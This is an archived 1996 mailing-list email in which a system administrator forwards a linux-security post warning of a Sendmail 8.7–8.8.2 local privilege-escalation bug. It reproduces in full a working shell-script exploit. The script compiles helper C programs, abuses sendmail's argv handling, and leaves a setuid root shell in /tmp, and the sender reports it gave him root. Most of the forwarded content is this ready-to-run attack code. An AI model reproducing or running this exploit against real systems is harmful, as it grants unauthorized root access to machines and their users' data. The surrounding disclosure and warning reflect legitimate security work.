New vulnerability in Sendmail
Hello,
I received this from the Linux Security mailing list today. I checked the
CERT archives and apparantly this problem is not yet documented. It looks
like it has a potential to be very serious.
I tested it out on my Debian system (sendmail 8.7.6) and it worked -- that is,
it gave a normal user a root shell. Yikes!
I have not yet seen any posted remedy for this situation, but I will be
certain to watch for one.
(CCs to Tom, Jeff, and Karl...I thought you might be interested to see this,
as it might effect your systems.)
------- Forwarded Message
Return-Path: linux-security-request@redhat.com
Return-Path: linux-security-request@redhat.com
Received: (from uucp@localhost) by complete.org (8.7.6/8.7.3) with UUCP id
SAA27814 for jgoerzen@complete.org; Sun, 17 Nov 1996 18:06:59 -0600
Received: from relay2.redhat.com (relay2.redhat.com [199.183.24.246]) by
onyx.southwind.net (8.8.2/8.7.3) with SMTP id RAA27451 for
<jgoerzen@complete.org>; Sun, 17 Nov 1996 17:39:32 -0600 (CST)
Received: (qmail 9371 invoked from network); 17 Nov 1996 23:29:37 -0000
Received: from redhat.com (list@199.183.24.1)
by relay2.redhat.com with SMTP; 17 Nov 1996 23:29:35 -0000
Received: (from list@localhost) by redhat.com (8.7.4/8.7.3) id SAA24956; Sun,
17 Nov 1996 18:29:15 -0500
Resent-Date: Sun, 17 Nov 1996 18:28:02 -0500
Date: Sun, 17 Nov 1996 02:36:33 +0100 (MET)
From: Dawnshadow <sdx@linnea.asogy.stockholm.se>
To: linux-security@redhat.com
Message-id: <Pine.LNX.3.95.961117023402.9268A-100000@linnea.asogy.stockholm.se>
MIME-version: 1.0
Content-type: TEXT/PLAIN; charset=US-ASCII
Content-transfer-encoding: 7BIT
Old-X-Envelope-From: sdx@linnea.asogy.stockholm.se Sat Nov 16 20:31:43 1996
Old-Status: O
Resent-Message-ID: <"5yBDt1.0.F46.1-vZo"@redhat.com>
Resent-From: linux-security@redhat.com
Reply-To: linux-security@redhat.com
X-Mailing-List: <linux-security@redhat.com> archive/latest/17
X-Loop: linux-security@redhat.com
Precedence: list
Resent-Sender: linux-security-request@redhat.com
Subject: [linux-security] Sendmail 8.8.2 exploit.
Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
similar:
#! /bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]"
"\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
------- End of Forwarded Message
--
John Goerzen | System administrator & owner, The Communications
Custom programming | Centre and Complete Network (complete.org)
jgoerzen@complete.org | Free Unix shell access, 316-367-8490 w/ your modem.
--
This message was distributed manually by Bruce@debian.org after the list
initially failed to distribute it.
Reply to: